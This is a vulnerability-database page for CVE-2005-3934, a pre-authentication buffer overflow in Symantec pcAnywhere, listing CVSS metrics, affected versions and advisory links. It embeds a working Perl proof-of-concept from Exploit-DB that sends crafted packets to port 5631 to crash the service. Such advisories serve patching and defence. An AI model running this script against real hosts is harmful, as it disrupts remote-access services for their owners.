CVE-2005-3934 : Detail

CVE-2005-3934

12.21%V3
Network
2005-12-01
10h00 +00:00
2017-07-19
13h57 +00:00
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CVE Descriptions

Buffer overflow in Symantec pcAnywhere 11.0.1, 11.5.1, and all other 32-bit versions allows remote attackers to cause a denial of service (application crash) via unknown attack vectors.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

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EPSS Score

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EPSS Percentile

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Exploit information

Exploit Database EDB-ID : 26665

Publication date : 2006-01-16 23h00 +00:00
Author : David Maciejak
EDB Verified : Yes

source: https://www.securityfocus.com/bid/15646/info Symantec pcAnywhere is vulnerable to a buffer overflow vulnerability. Because the flaw can be triggered prior to authentication, the vulnerability is exploitable by remote attackers without valid credentials. It is confirmed that the vulnerability can be exploited to cause a denial of service. Supported versions 11.0.1 and 11.5.1 are confirmed affected. Previous versions are vulnerable and users are advised to upgrade to the latest supported version. Patches are available. #!/usr/bin/perl -w # Version 2.0 # # PoC for # pcAnywhere Authentication Denial of Service Vulnerability # Bugtraq ID: 15646 # # Tested on pcanywhere v11.0 and v11.0.1 # # Author: David Maciejak # Date: 20060117 # ############################## use IO::Socket; if (@ARGV<1) { die "usage: $0 pcanywhere_ip [port]"; } $host=$ARGV[0]; $port=$ARGV[1] || 5631; $|=1; $cl1="\x00\x00\x00\x00"; $cl2="\x6F\x06\xff"; $cl3="\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00"; $cl4="\x6f\x62\x01\x02\x00\x00\x00"; $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ); die "Could not create socket: $! \n" unless $sock; $sock->send($cl1); $sock->recv($buff,32768); $sock->send($cl2 x 50); $sock->recv($buff,32768); $sock->send($cl3 x 50); $sock->recv($buff,32768); $sock->send($cl4); $sock->recv($buff,32768); $str='\x06'.'\x04'.'\0xffffffc0'x300; $sock->send($str x 50); close $sock;

Products Mentioned

Configuraton 0

Symantec>>Pcanywhere >> Version 8.0.1

Symantec>>Pcanywhere >> Version 8.0.2

Symantec>>Pcanywhere >> Version 9.0

Symantec>>Pcanywhere >> Version 9.0.1

Symantec>>Pcanywhere >> Version 9.2

Symantec>>Pcanywhere >> Version 10.0

Symantec>>Pcanywhere >> Version 10.5

Symantec>>Pcanywhere >> Version 11.0

Symantec>>Pcanywhere >> Version 11.0.1

Symantec>>Pcanywhere >> Version 11.5

Symantec>>Pcanywhere >> Version 11.5.1

References

http://secunia.com/advisories/17797
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/15646
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1015284
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2005/2658
Tags : vdb-entry, x_refsource_VUPEN